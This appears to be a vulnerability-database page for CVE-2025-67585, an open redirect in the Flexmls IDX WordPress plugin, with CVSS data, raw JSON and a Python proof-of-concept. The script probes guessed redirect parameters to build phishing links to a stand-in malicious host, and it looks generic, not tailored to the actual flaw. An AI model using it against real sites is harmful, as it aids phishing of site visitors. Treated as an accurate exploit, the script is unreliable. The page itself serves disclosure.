Security Vulnerability Report
中文
CVE-2025-67585 CVSS 4.7 MEDIUM

CVE-2025-67585

Published: 2025-12-09 16:18:36
Last Modified: 2026-04-15 00:35:42

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in flexmls Flexmls® IDX flexmls-idx allows Phishing.This issue affects Flexmls® IDX: from n/a through <= 3.15.7.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

flexmls-idx <= 3.15.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67585 Open Redirect PoC # Target: WordPress site with flexmls-idx plugin <= 3.15.7 def exploit_open_redirect(target_url, redirect_url): """ Exploit open redirect vulnerability in flexmls-idx plugin Args: target_url: Base URL of the vulnerable WordPress site redirect_url: Malicious URL to redirect victims to Returns: Malicious URL that can be used for phishing attacks """ # Common redirect parameter patterns in WordPress plugins redirect_params = ['redirect', 'redirect_to', 'url', 'return', 'callback'] for param in redirect_params: # Construct malicious URL with open redirect payload malicious_url = f"{target_url}?{param}={requests.utils.quote(redirect_url)}" print(f"[*] Testing parameter: {param}") print(f"[*] Malicious URL: {malicious_url}") # Send request to check if redirect occurs try: response = requests.get(malicious_url, allow_redirects=False, timeout=10) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if redirect_url in location: print(f"[!] Vulnerable! Redirects to: {location}") return malicious_url except requests.RequestException as e: print(f"[!] Error: {e}") return None # Example usage # Replace with actual target and attacker-controlled URL TARGET = "http://vulnerable-site.com/wp-content/plugins/flexmls-idx/" ATTACKER_URL = "https://malicious-site.com/phishing" print("CVE-2025-67585 Open Redirect Exploitation") print("=" * 50) exploit_open_redirect(TARGET, ATTACKER_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67585", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:36.390", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in flexmls Flexmls® IDX flexmls-idx allows Phishing.This issue affects Flexmls® IDX: from n/a through <= 3.15.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/flexmls-idx/vulnerability/wordpress-flexmls-idx-plugin-3-15-7-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}